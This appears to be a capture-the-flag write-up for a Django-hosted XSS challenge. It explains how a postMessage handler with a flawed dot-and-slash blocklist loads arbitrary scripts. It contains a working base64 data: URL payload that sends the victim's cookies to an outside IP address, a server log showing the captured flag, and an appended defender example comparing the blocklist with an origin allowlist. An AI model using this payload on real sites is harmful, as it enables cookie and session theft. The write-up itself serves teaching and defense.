@vladvis
Created July 30, 2018 23:48
dot free write-up

  • Firstly, we tried a random URL and got a 404 with Django's debug page.
  • There was a hint: "Using the URLconf defined in XSSWebSite.urls"
  • OK. This challenge is about XSS.
  • Then we noticed the JS on the main page:
function lls(src) {
    // Loads an arbitrary script URL by appending a <script> element to the body.
    var el = document.createElement('script');
    if (el) {
        el.setAttribute('type', 'text/javascript');
        el.src = src;
        document.body.appendChild(el);
    }
}

function lce(doc, def, parent) {
    // Creates an element named def[0], sets the attribute name/value pairs in def[1..], appends it to parent.
    var el = null;
    if (typeof doc.createElementNS != "undefined") el = doc.createElementNS("http://www.w3.org/1999/xhtml", def[0]);
    else if (typeof doc.createElement != "undefined") el = doc.createElement(def[0]);

    if (!el) return false;

    for (var i = 1; i < def.length; i++) el.setAttribute(def[i++], def[i]);
    if (parent) parent.appendChild(el);
    return el;
}
window.addEventListener('message', function (e) {
    if (e.data.iframe) {
        // Blocklist on the value: no '.', no '//', no '。'. The last clause, typeof(... != 'object'),
        // always evaluates to the string "boolean" and therefore never rejects anything.
        if (e.data.iframe && e.data.iframe.value.indexOf('.') == -1 && e.data.iframe.value.indexOf("//") == -1 && e.data.iframe.value.indexOf("。") == -1 && e.data.iframe.value && typeof(e.data.iframe != 'object')) {
            if (e.data.iframe.type == "iframe") {
                // 'doc' is not defined anywhere in the snippet shown, so this branch is effectively unusable.
                lce(doc, ['iframe', 'width', '0', 'height', '0', 'src', e.data.iframe.value], parent);
            } else {
                // Any other type (e.g. 123) goes straight to a script load.
                lls(e.data.iframe.value)
            }
        }
    }
}, false);
window.onload = function (ev) {
    // Parses the query string as JSON and posts it to the page itself; the listener never checks e.origin.
    postMessage(JSON.parse(decodeURIComponent(location.search.substr(1))), '*')
}
  • OK. We can build JSON which spawns a script block:
{"iframe":{"value":"data:;base64,ZG9jdW1lbnQubG9jYXRpb24gPSAnaHR0cDovLzUxLjY4LjEyNi4xOTcveHNzLnRlc3Q/Jytkb2N1bWVudC5jb29raWU=","type":123}}
  • This payload spawns a script block that leaks the user's cookies:
<script type="text/javascript" src="data:;base64,ZG9jdW1lbnQubG9jYXRpb24gPSAnaHR0cDovLzUxLjY4LjEyNi4xOTcveHNzLnRlc3Q/Jytkb2N1bWVudC5jb29raWU="></script>
  • We submitted the malformed URL and got the flag on our server:
13.57.104.34 - - [28/Jul/2018:14:25:27 +0200] "GET /xss.test?flag=rwctf%7BL00kI5TheFlo9%7D HTTP/1.1" 404 502 "http://127.0.0.1/?%7B%22iframe%22:%7B%22value%22:%22data:;base64,ZG9jdW1lbnQubG9jYXRpb24gPSAnaHR0cDovLzUxLjY4LjEyNi4xOTcveHNzLnRlc3Q/Jytkb2N1bWVudC5jb29raWU=%22,%22type%22:123%7D%7D" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
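The blocklist the message handler applies to `e.data.iframe.value`, reproduced as a pure function beside the allowlist check a defender would use instead; this is an added example, not code from the challenge or the write-up. `PAGE_ORIGIN`, `TRUSTED_SCRIPT_ORIGINS` and the sample inputs are assumed values constructed for the example.

```javascript
// Added example (not from the challenge or the gist). Runs in Node.js, no DOM needed.

// The challenge's check, plus one guard (typeof string) so a non-string value
// cannot throw on indexOf. Note that typeof (x != 'object') is always the
// string "boolean", which is truthy, so that clause never rejects anything.
function originalFilterAccepts(value) {
  return Boolean(
    typeof value === 'string' &&
    value.indexOf('.') === -1 &&
    value.indexOf('//') === -1 &&
    value.indexOf('\u3002') === -1 && // ideographic full stop "。"
    value &&
    typeof (value != 'object')
  );
}

// Defender's version: resolve the candidate against the page origin and accept
// only http(s) URLs whose origin is on a fixed allowlist. PAGE_ORIGIN and the
// allowlist are assumed values for this example.
const PAGE_ORIGIN = 'http://127.0.0.1';
const TRUSTED_SCRIPT_ORIGINS = new Set([PAGE_ORIGIN]);

function hardenedFilterAccepts(value) {
  if (typeof value !== 'string' || value.length === 0) return false;
  let url;
  try {
    url = new URL(value, PAGE_ORIGIN); // throws on unparseable input
  } catch (_) {
    return false;
  }
  // data:, javascript:, blob: and similar schemes fail the protocol check;
  // protocol-relative inputs such as "//host/x" resolve to a foreign origin
  // and fail the allowlist check.
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return false;
  return TRUSTED_SCRIPT_ORIGINS.has(url.origin);
}

// Constructed sample inputs (the base64 body is a placeholder, not the
// challenge payload).
const SAMPLES = {
  dataUrl: 'data:;base64,QUFBQQ==',
  relativeNoDot: '/static/app',
  protocolRelative: '//evil.example/x.js',
};
```

The data: URL contains none of the blocked characters and so passes the original check, while the allowlist rejects it on scheme alone; the same allowlist still admits a same-origin relative path.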